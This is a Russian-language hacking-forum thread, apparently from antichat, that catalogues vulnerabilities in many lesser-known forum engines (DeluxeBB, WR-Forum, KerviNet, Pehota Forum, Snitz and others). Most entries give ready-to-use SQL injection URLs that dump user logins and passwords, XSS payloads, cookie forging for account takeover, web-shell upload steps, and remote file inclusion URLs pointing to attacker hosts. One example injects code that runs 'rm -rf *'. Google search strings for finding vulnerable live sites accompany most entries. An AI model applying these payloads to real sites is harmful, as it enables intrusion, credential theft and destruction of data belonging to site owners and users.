[Обзор уязвимостей в форумных движках]
 

----------------------------------------------------------------

Так же обратите внимание на темы:

[Обзор уязвимостей Ipb]

[Обзор уязвимостей phpBB]

[Обзор уязвимостей vBulletin]

[Обзор уязвимостей Ikonboard]

[Обзор Уязвимостей Yabb]

[Обзор уязвимостей myBB]

[Обзор уязвимостей Phorum]

[Обзор уязвимостей Woltlab Burning Board + Lite]

[ Обзор уязвимостей miniBB ]

Обзор уязвимостей PunBB

Обзор уязвимостей IceBB

[Обзор уязвимостей XMBForum]

----------------------------------------------------------------

Эти темы так же могут быть вам полезны:

Бэкдорим форумы. Теория и практика!

[FAQ + полезные ссылки]

- в этой теме вы сможете найти ответы на наиболее частые вопросы.

----------------------------------------------------------------

В этой теме будут выкладываться уязвимости, разных не очень популярных форумных движков.

----------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.06

Уязвимость в сценарие misc.php, из за недостаточной обработки данных в параметре name можно осуществить SQL инъекцию.

Пароль пользователя:

где uid= - номер пользователя

Эксплойт:

Использование эксплойта:

путь к эксплойту сайт и путь до форума номер пользователя

c:\expl.pl http://site.com/forum/ 1

Сайт и путь до форума писать слитно:

http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта

Резултат работы эксплойта - хеш (md5) пароля выбранного пользователя.

Пример уязвимости:

Уязвимость под относительно старые форумы - всетреить такие можно не часто, особенно если учесть что сами движки форумов не сильно распространены.

------------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.06

Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

Уязвимых сценариев несколько:

При проверки узявимости

вылезала ошибка из которой было видно что к строке добавляеться /posticons.php (т.е. в результате строка выглядела 123/posticons.php), что отлично исправляеться добавлением к строке %00, т.е. в результате запрос долже выглядить так:

Форум: DeluxeBB
Версия: <= 1.07

Для этой версии есть эксплойт для получения админских привилегий.

Эксплойт:

Использование эксплойта:

путь к эксплойту сайт и путь до форума ваш логин ваш пароль

c:\expl.pl http://site.com/forum/ grey 123123

Сайт и путь до форума писать слитно:

http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта

Резултат работы эксплойта - получение админских привилегий.

------------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.9

Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

На этот раз уязвим сценарий sig.php.

Из кода видно что для инклюда необходимо вывполнение условия $settings['smilies']=='on', а так же наличие %00, т.к. к строке будет добавляться /smilies.php.

В результате:

где [file] - файл, который будет инклюдиться, а settings[smilies]=on присвоение переменной необходимого для инклюда значения.

Форум: WR-Форум
Версия: 1.8

Стандартный пароль который изначально стоит на форуме (на админку /admin.php) - admin. Конечно врятли что его не сменили но всё таки попробывать можно.

Есть несколько активных XSS.

В профиле в полях:

1. Откуда - скрипт будет срабатывать при просмотре страницы Участники.
2. Домашняя страничка - скрипт будет срабатывать при просмотре страницы Участники.

3. Подпись - скрипт будет срабатывать при просмотре сообщений в темах.

Вводим <script>alert();</script>

4. При регистрации создаём пользователя с именем <script>alert();</script> - почти на каждой странице будет срабатывать ваш код.

Куки пользователя выглядят примерно так:

wrfcookies=Grey%7C123%7C1176741104%7C1176741104%7C

%7C123%7C1176741104%7C1176741104%7C - это аски коды, если представить как символы то получиться, такая строка:

|123|1176741104|1176741104|

где |123| - пароль пользователя

Куки админа выглядят так:

frcookies=1%7Cadmin%7C1176740994%7C

Опять же если представить аски коды как символы то получиться:

1|admin|1176740994|

где |admin| - пароль к админ-центру

Видно что пароли не только не шифруються, но и храняться в куках, имею активную xss достать куки будет не сложно.

------------------------------------------------------------

Заливка шелла:

http://forum.antichat.ru/showpost.ph...8&postcount=18

------------------------------------------------------------

Скачать форум можно здесь: http://wr-script.ru/

Для поиска сайтов с таким форумом вводим: Powered by WR-Forum

Кстати сайтов с таким форумом не так уж и мало:

__http://www.google.ru/search?hl=ru&q=Powered+by+WR-Forum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+G oogle&lr=

Форум: RonForum
Версия: v30

Доступ в админку:

Если открыть файл admin.php и посмотреть его содержимое, то можно встретить такую строку:

Эта строка идёт после проверки пароля вводе пароля, содержимого куков, но изначально никакого значения эта переменная не имеет, ей только присваиваеться значение в случае, если пароль введён правильно.

Переходим в админку:

http://site.com/from/admin.php

Теперь присваиваем переменной entrance необходимое значение 1:

http://site.com/from/admin.php?entrance=1

Теперь вы в админке, но есть не большой минус: при переходе по любой ссылке, значение переменной будет утеряно, что бы этого не случилось смотрим адрес ссылки, к примеру:

http://site.com/from/admin.php?what=moderators

и добавляем к ней необходмиое значение:

http://site.com/from/admin.php?entrance=1&what=moderators

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright © Kwasnikov R.P

------------------------------------------------------------
------------------------------------------------------------

Форум: ParkerForum
Версия: 0.01

Активная XSS

В поле Сайт, при создание новой темы вводим <script>alert();</script> - скрипт будет выплняться при просмотре главной страницы форума, а так же при просмотре темы.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyrights (C) by ademan

------------------------------------------------------------
------------------------------------------------------------

Форум: Древообразный форум
Версия: 1.0

Активная XSS

Уязвимы поля Name и Subject.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Скрипт предоставлен www.chemport.ru

tForum <= b0.915
Форум малораспространённый, но всё же.

Активная XSS в поле "Message".



Вставляем в поле "Message":



В кукисах сессия, логин.


Ссылка для поиска в Google:

Форум: KerviNet
Версия: 1.1

Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

Сценарий topic.php.
Уязвим параметр forum.

------------


Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к базе данных:

topic.php?forum=-1+union+select+1/*

Таблица с пользователями:

topic.php?forum=-1+union+select+1+from+users/*

Вывод логина, пароля и мыла пользователя:

topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users/*

В результате запроса получаем: 1:TEST:123:grey@site.ru

где 1 - номер пользователя, TEST - имя пользователя, 123 - пароль пользователя, заметьте пароль храниться в незашифрованном виде, grey@site.ru - мыло пользователя
char(58) - это символ ':' который в нашем случае служит разделителем.

Перебор пользователей:

topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+0,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+1,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+2,1/*

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright KerviNet © 2005-2007

------------------------------------------------------------
------------------------------------------------------------

Форум: XMB
Версия: 1.5

Активная XSS

Уязвим параметр MSN.

При регистрации пользователя в поле MSN вводим <script>alert();</script>, скрипт будет срабатывать при просмотре профиля пользователя.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered by XMB

Форум: ITA forum
Версия: 1.21
Версия: 1.31
Версия: 1.49

Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

Сценарий showforum.php.
Уязвим параметр fid.

------------

Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к БД и в результате получам имя и хеш (mysql4) пароля пользователя:

Перебираем пользователей:

------------

Для удобства написал небольшой слойт, который выдирает хеш пользователя (id пользователя задаёться):

Использование сплойта:

php c:\exp.php site dir user_id

php c:\exp.php site.ru /forum/ 1

site - сайт
dir - директория с форумом
user_id - номер пользователя

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: V1.21
Для поиска сайтов с таким форумом вводим: Powered By: V1.31
Для поиска сайтов с таким форумом вводим: Powered By: V1.49

К сожалению можно встретить и пропатченную версию, в которой эта уязвимость исправленна.

------------------------------------------------------------
------------------------------------------------------------

Другие уязвимости:

1. Форум: ITA forum
Версия: 1.31 (возможно и другие версии)
Версия: 1.49 (возможно и другие версии)

Пассивная XSS:

2. Форум: ITA forum
Версия: 1.49 (возможно и другие версии)

SQL инъекция:

Форум: Board
Версия: 2.0

1. SQL инъекция

Сценарий view_all_topic.php.
Уязвим параметр m_id.

------------

Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к БД в результате, логин, пароль (пароль не зашифрован) и мыло пользователя:

2. Пасивная XSS

В поиске вводим <script>alert();</script> - скрипт выпольнится.

3. Активная XSS

При создание темы/сообщения вписываем в поле заголовка сообщения или в текст сообщения <script>alert();</script> - скрипт будет выпольняться при ответе на данное сообщение/тему.

4. Возможность заходить от любого пользователя, без ввода пароля.

Смотрим содержимое куков:

board_user_cook=qwerty; board_user_id=3

board_user_cook - имя пользователя
board_user_id - номер пользователя

Теперь меняем эти значения:

К примеру есть пользователь max и его номер 1:

board_user_cook=max; board_user_id=1

Всё теперь вы пользователь max.

------------

В Опере значение куков менять так:

Инструменты - Дополнительно - Cookies

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright ° CarLine 2002г.

Не смотря на то, что форум старый сайтов с таким форумом достаточно много.

------------------------------------------------------------
------------------------------------------------------------

Форум: ReForum
Версия: 1.0

SQL инъекция

Уязвим параметр viewth.

------------------------------------------------------------

Форум: Trofimov forum
Версия: v1.2

Активная XSS в поле Имя.

Скрипт срабатывает после добавления темы (страница forum.php).

------------------------------------------------------------
------------------------------------------------------------

Форум: TROforum
Версия: 0.3

Из-за не коректной обработки параметров, можно войти в админку имея только пароль:

Как видно из этой строки войти в админку можно имея вместо пароля логин.
Изначально логин - login.

Но перед этим условием стоит условие:

Само условие не верно, т.к. оно звучит так: Если Логин И Пароль не верны, то прекратить выполнение скрипта.

Из условия следует, что если только логин или пароль будет неверным, то работу скрипта прекращать не следует.

Имя только логин (а его угадать проще(login, admin или просто имя админа)), можно получить полный доступ к админке:

Таким образом переменным login и password присваиваются необходимые для входа значения.

Но здесь всё проще - файл настроек не требует авторизации:

А именно в этом файле хранятся Логин и Пароль, сменить которые не составит труда.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered by: TROforum 0.3

Форум: pHpAS
Версия: 1.26

1. Активная XSS.

1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.

Скрипт будет выполняться при про смотре коментариев.

2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.

Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.

2. SQL инъекция.

Уязвимость в сценарие show.php в параемтре id.

Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26

------------------------------------------------------------
------------------------------------------------------------

Форум: electrifiedForum
Версия: v1.70

1. Пасивная XSS.

Есть еще одна но, она будет выполняться только с админскими привилегиями:

2. Активная XSS.

1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.

2) В профиле в подписе (Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.

3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70

Форум: He11.net Forums
Версия: 1.0

1. Пасивная XSS.

2. SQL инъекция.

1) в результате получаем строку вида:

1:grey:202cb962ac59075b964b07152d234b70:123

В базе данных хранится и зашифрованный пароль (md5) и пароль в чистом виде.

2) ------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"

Пример уязвимого форума:

__http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char( 58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9, 10,11,12+from+Dragon_users/*

------------------------------------------------------------
------------------------------------------------------------

Форум: UBB Threads
Версия: 5.5

Пассивная XSS:

Активная XSS:

При создание сообщения на форуме в поле Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.

Заливка шелла:

Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).

Шелл будет доступен по адресу:

http://site.ru/includes/header.php

Форум FastBB 9.20

1. Возможности писать в закрытые темы.

Необходимо зайти в закрытую тему, в адресной строке поменять №1 на №6 - и
попадаешь на страницу создания сообщения. Пишешь сообщение, отправляешь и оно
появляется в теме.

Форум: Ultimate PHP Board

Необходимо зарегестрироватся.Регестр� �руемся и запоминаем что мы написали.
Теперь самое интересное - использование уязвимости. Баг в форуме в том что у всех зарегестрированных пользователей есть права на просмотр файлов:
_http://www.forum.de/forum/admin.php - панель администратора.
_http://www.forum.de/forum/admin_forum.php - администрирование форумами.
_http://www.forum.de/forum/admin_members.php - позволяет редактировать пользователей.
_http://www.forum.de/forum/admin_config.php - панель настройки форума.
Идем на _http://www.forums.de/forum/admin_members.php и перед нами список пользователей. Ставим себе права админа, перезаходим, удаляем бывших админов и форум ваш! ;)

Форум: Anyboard все версии
Локальный инклуд файлов в параметре vf
Например на сайте производителя:

XSS уязвимость на Intellect Board 2.12
 

XSS уязвимость на Intellect Board 2.12

Была найдена XSS уязвимость в форумном движке Intellect Board 2.12.
Устранение: Обновить скрипты.
Уязвимость: можно в качестве адреса домашней страницы или ЖЖ поставить javascript:. А дальше - классическая XSS: перехватываем идентификатор сессии админа и влезаем в АЦ. Правда, сделать это не так уж и просто: по умолчанию там выполняется привязка сессии к HTTP_USER_AGENT, да и время жизни сессии ограничено несколькими часами.

ExBB
Описание:Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell

VistaBB <= 2.x
Описание:Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251

Woltlab Burning Board 2.3.5
Описание:Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810

MiniBB <=1.5
Описание:Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?

MyBB < 1.1.3
Описание:Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909

PHORUM 5
Описание:Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008

UBB Threads

1.UBBThreads 5.x,6.x
Описание:Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере

2.UBB.threads >= 6.4.x
Описание:Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : */addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

Zix Forum
Описание:Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select% 201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1 ,1,J_Pass,null,null,null,null,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLog ins where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select% 201,null,null,null,1,1,1,null,1,1,J_User,null,1,1, 1,1,1,J_Pass,null,null,null,nu
ll,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20ad minLogins where approve=1 and '1'='1'

qjForum

Описание:Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username, 0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20memb er

tinyBB <= 0.3
Описание:Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

FunkBoard

Описание:Уязвимость в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875

QBoard <= v.1.1
Описание:Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]

FlashBB <= 1.1.5
Описание:Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921

LiteForum 2.1.1
Описание:Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt

Forum Russian Board 4.2
Описание:Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt

OpenBB 1.0.5
Описание:SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt

Gravity Board X v1.1
Описание:Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt

Zorum forum
Описание:выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt

Форум: WR-Форум
Версия: 1.8

------------------------------------------------------------

Про уязвимости форума читать тут:

http://forum.antichat.ru/showpost.ph...51&postcount=4 - (активные XSS)

------------------------------------------------------------

Заливка шелла (через админку):

Заходим в админку -> Настройки, в поле Описание (или в поле Е-майл администратора) вписываем код шелла следующим образом:

";?> <? Код шелла ?> <? //

к примеру сделам вывод строки 123123:

";?> <? echo(123123); ?> <? //

Шелл будет доступен по адресу:

http://site.ru/forum/config.php

При внедрение кода работа форума нарушена не будет.

Форум: VumFOrum
Версия: v2.5

Пасcивная XSS:

Активная XSS:

1) В поле Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.

2) При регистрации пользователя в поле Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.

Заливка шелла:

Способ 1:

При создание темы/сообщения прикрепляем файл - шелл.

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

Способ 2:

При регистрации на форуме, в поле Имя введите ../shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/shell.php

Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:

При регистрации на форуме, в поле Имя введите ../upload/shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

Форум: SMDS Forum
Версия: v.2.1 rus

Локальный инклуд:

Пассивные XSS:

Заливка шелла:

В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:

http://site.ru/Downloads/shell.php

[Мини Обзор Уязвимостей SowiBB 3]
 

сразу хочу сказать, что данный обзор по моему мнению не претендует на то чтобы ему присвоили статус "ВАЖНО" т.к. он слишком мал, а рассматриваемый форум не популярен. форум я выбирал не специально, а просто взял нижний из списка. все уязвимости находил сам.
работал только с 1 персией форума, насколько я понял последней.
сам форум на удивление дырявый..постю в надежде, что вдруг кому-нибудь пригодится.

итак:

SowiBB 3 RC 2

================================================== ====================
если использовать в качестве ника
"><script>alert(99)</script>
то у вас будет вылетать алерт:
при логине у вас будет вылетать алерт
================================================== ====================
при попытке отправьть письмо на email такому пользователю будет вылетать алерт:
пример:================================================== ====================
при попытке отправьть ПМ такому пользователю будет вылетать алерт:
пример:
================================================== ====================
также можно заполнить поля ICQ MSN AIM YAHOO "><script>alert(99)</script> при просмотре списка пользователей
вылетает 4 алерта.
================================================== ====================
если сознать тему с названием то при её просмотре как "снаружи" так и изнутри
будет вылетать алерт
================================================== ====================
при просмотре stats.php если у вас есть темы или ники в которых присуцтвует "><script>alert(99)</script> будет вылетать алерт.
================================================== ====================
если при отправке ПМ в качестве темы сообщения указать "><script>alert(99)</script>
то при чтении сообщения вылетит алерт.
================================================== ====================
если на страничке добавления аватара в поле Location: написать "><script>alert(99)</script> - то он вылетит алерт
================================================== ====================
ну и кароче как я понял везде где спетится скрипт - он выполняется, почти везде.
================================================== ====================
заливаем шелл:
в админке
Skin Manager
> Image Uploader

расширение php пропускает. шелл будет лежать по адресу

Делать нечего,качнул дистрибутив и поставил на локалхост.После пятиминутного изучения сорцов стало ясно что там отстуствует фильтрация вообще

Иньекция в логине , ' or 1=1/* , а также уязвимы сценарии lostpw.php , profile.php , forum.php , viewgroups.php , а также во всех скриптах на любой вкус - UPDATE / INSERT / SELECT xD . Куча xss , вот пару активных

Но и этого мало , смотрим код залива аватара в профиле

Гениально - подменяем хттп запрос и указывая php файл для аплоада меняем в хттп заголовке application/octet-stream на например image/gif.Все

cyberBB v. 0.4

Скачать можно здесь:

http://sourceforge.net/project/platformdownload.php?group_id=170656

-------------------------------------------------------------------

SQL инъкция:

Вывод логина и пароля пользователя:

Получаем логин и хеш (мд5) пароля пользователя.

Pehota Forum 1.05 и Pehota_Forum v1.10b

Скачать можно здесь: http://www.woweb.ru/load/56-1-0-4272

---------------------------------------------------------------------

1. Заливка шелла:

Регимся на форуме с ником blabla.php, вообщем так что бы ник (логин) заканчивался на .php

Предположим shell.php

Теперь заходим под этим логином, после чего идём в профиль выбираем загрузку аватары и заливаем шелл, всё шелл доступен по адресу:

http://site.ru/forum/user/shell.php/avator_shell.php

т.е. имя аватары формируется из avator_ + имя пользователя.

2. Проверялось на версии Pehota_Forum v1.10b - возможность узнать логины и пароли пользователей.

Из-за отсутствия .htaccess в "стандартном комплекте", можно просматривать файлы, файл с паролями:

http://test.ru/data/user.dat

3. Проверялось на версии Pehota_Forum v1.10b - повышение привилегий до админских.

Регимся

В поле Имя вводим login -вообщем тут не важно что
В поле Пароль (ну и в подтверждение пароля) вводим pass,2,3,Admin,
В поле с мылом вводим 123@123.ru - вообщем то что выглядит как нормальный адрес.

Получаем аккаунт: login:pass с админскими правами.

4. Проверялось на версии Pehota_Forum v1.10b - заливка шелла через админку

В админке - Настройки

Либо в поле Тем на страницу в admin.php:Ю либо в поле Тем на главную страницу: вписываем:

10"; system($HTTP_GET_VARS['cmd']); $aaaaa="

Получаем шелл:

http://test.ru/params.php?cmd=[cmd]

1. Tiny PHP Forum v3.61

Скачать можно здесь: http://sourceforge.net/project/showf...group_id=98590

Пассивные xss:

Для поиска этого форумного двига вводим: Powered by TinyPHPForum v3.61

Уязвимости для версии 3.60:

http://www.securitylab.ru/vulnerability/243758.php

Активная XSS ("1. Уязвимость существует из-за недостаточной") присутствует и в версии 3.61

--------------------------------------------------------------------
--------------------------------------------------------------------

2. Nexus Forum

Скачать можно здесь: http://sourceforge.net/project/showf...roup_id=112138

Отсутствие .htaccess:

Из-за отсутствия в "комплекте форума" файла .htaccess, есть возможность просматривать пароли, пользователей:

http://localhost/forum/users/Имя пользователя/pass.txt

--------------------------------------------------------------------
--------------------------------------------------------------------

3. mForum

Скачать можно здесь: http://sourceforge.net/project/showf...roup_id=191244

SQL инъекция:

В скрипте register.php в запрос

можно внедрить sql инъекцию:

Делаем следующее:

Регимся на форуме (Register), в поле Username: вставляем 1','','',version(),'')/* остальные поля заполняем произвольно, но соблюдая требования (пароль > 4 символов, мыло по виду user@site.ru)
После чего переходим к просмотру пользователей (Members list), там открываем профиль нашего пользователя (а его имя будет 1 (т.к. -->1<--','','',version(),'')/*)) и видим в поле "Registered:" вывод версии БД.
К сожалению из-за ограничения на длину имени пользователя ввести более длинный запрос не получится.

Для поиска этого форумного двига вводим: Powered by mForum

Уязвимость в FUDForum

URL производителя: fudforum.org

1. Уязвимость в admbrowse.php позволяет просматривать произвольные файлы:

2. уязвимость в tmp_view.php позволяет просматривать произвольные файлы:

QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities

#download: http://www.qt-cute.org/download/qtf13.zip

#vulncode:

$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");

#exploits:

(c) milw0rm.com

DeluxeBB <= 1.09 Remote Admin Email Change Exploit
 

Движок: DeluxeBB
Версия: <= 1.9

SNITZ FORUMS 2000

Сайт: http://forum.snitz.com/
Описание: Форум малораспространенный, но все же иногда приходится с ним сталкиваться.

Даты выхода версий: http://sourceforge.net/project/showfiles.php?group_id=8812&package_id=8895

P.S. google.ru: Результаты 1 - 10 из примерно 2 270 000 для "Powered by Snitz"


Snitz2000 3.1 SR4
16 февраля 2007

SQL инъекция в файле pop_profile.asp

ссылка: http://www.milw0rm.com/exploits/3321

Snitz2000 (3.3 - 3.3.03)
20 апреля 2002

SQL инъекция в members.asp

Snitz2000 3.3.03
13 мая 2003

SQL инъекция в register.asp
Не фильтруется поле email. Возможен запуск xp_cmdshell (пользователь "sa")

Сплоит:
Snitz2000 3.4 (?)
18 апреля 2003

XSS. Обходятся существующие фильтры символом табуляции (0x09)

Например:
Snitz2000 3.4.03

1). Сброс пароля у любого пользователя
21 июня 2003

Запрашиваем "забытый пароль". Сохраняем страницу на HDD. Меняем ID пользователя в блокноте (например) на любой существующий. Жмем кнопку. Все

2). XSS
21 июня 2003

Snitz2000 3.4.04

1). XSS в файле register.asp
16 июня 2004

При регистрации нового пользователя/ редактировании аккаунта можно ввести в поле E-mail address
2). Http response splitting
16 сентября 2004

Сплоит:
Snitz2000 3.4.05

1). SQL инъекция в файле inc_header.asp
11 июня 2006

бажный кусок кода:
Сплоита нет

2). XSS в файле post.asp
2 ноября 2005

пример:
[CODE]http://[host]/snitz/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&type=Snitz2000 3.4.06

1). SQL инъекция в active.asp.
5 декабря 2007

Пользователь может получить привилегии администратора.

HTML-сплоит для поднятия прав (необходимо зарегистрироваться на форуме, зайти на него, исправить [VICTIM URL] на работающий адрес, ну и запустить его):
2). XSS
14 сентября 2006

3). возможная XSS в файле pop_profile.asp.
7 марта 2007

Доказательств нет

ссылка: http://securityvulns.ru/CVE-2007-1374.html

Snitz2000 3.4 Avatar MOD 1.3
18 мая 2006

Загрузка произвольных файлов (шеллов и тд) в обход ограничений, указанных в моде (jpg, jpeg, gif, png), используюя POISON NULL BYTE (то есть %00)

________________________________________________
3.4.06 - последняя версия
При обнаружении ошибок и неточностей, а также если есть, чем дополнить, - прошу в ПМ (флудить тут не надо) пост восстановлен

MyPHP Forum Vulnerability
 

MyPHP Forum Vulnerability

Exploits/Shellcode

MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities
MyPHP Forum <= 3.0 (Final) Remote SQL Injection Vulnerability

SQL-инъекция во многих сценариях в MyPHP 1.0 форуме
Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды на системе.

Exploit:

DeluxeBB 1.1 XSS Vulnerability
 

DeluxeBB 1.1 XSS Vulnerability

PoC:

tinyBB v0.2 Message Board Remote File Include
 

Vendor: http://php.arsivimiz.com/indir.php?id=335

Remote File Include

Vulnerable: tinyBB v0.2

PoC:

Уязвимости QuickTalk Forum
 

Уязвимости QuickTalk Forum

URL производителя: http://www.qt-cute.org/

QuickTalk Forum <= 1.6 Blind SQL Injection Exploit


Инклюдинг локальных файлов в QuickTalk forum

Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.

Forum Pay Per Post Exchange <= 2.0 SQL Injection Vulnerabilitys
milw0rm.com [2008-06-15]

[Обзор уязвимостей Ultimate PHP Board]
 

www.myupb.com

UBP Version <=1.9.6

Заводим себе админа
При установке форума заводится акаунт admin с уровнем доступа admin, но при повторной регистрации акаунта admin (но уже через register.php) скрипт не ругается и регистрирует его, но с правами member. В больших форумах (с большим числом пользователей) вероятна атака спуфинга (запрос паролей и другой информации от пользователей под видом администратора).

Bесь список юзеров, пароли ( к сожалению зашифрованные) почту юзера, дату реги, итп.
Отправка письма: от user к user2
Возможность Залогинится под Админом или любым другим юзером
Выполнение Кода
UPB протоколирует некоторую информацию о посетителях [такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории db, который называется iplog. Затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает iplog. Например:

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

когда администратор вызовет admin_iplog.php, ваш код php будет выполнен.
Пример:
1. <? system( "echo \'hacked\' > ../index.html" ); ?>
дефейсит главную страницу форума.
2. создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf *
после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php.

XSS
Раскрытые пути
UBP Version 2.0

Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе, уязвимость существует из-за ошибки в обработке входных данных в параметре «_CONFIG[skin_dir]» сценарием header_simple.php. Атакующий может выполнить произвольный сценарий с привилегиями запущенного Web сервера.

Пример:
UBP 2.0b1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "option" сценарием chat/login.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

Форум: Advanced Electron Forum(AEF)
Версия: 1.0.6

Активные XSS

1 активная

Заходим в профиль уявимое поле WWW: вводим 2 активная

Создаём тему в названии темы вводим 3 активная

В подписи вводим:

Поиск: Powered By AEF 1.0.6 © 2008 Electron Inc.

Скачать форум: http://www.anelectron.com/download.php

(c) ~!Dok_tOR!~

UPDATE

Advanced Electron Forum <= 1.0.6 Remote Code Execution

Сценарий /main/functions/bbc_functions.php

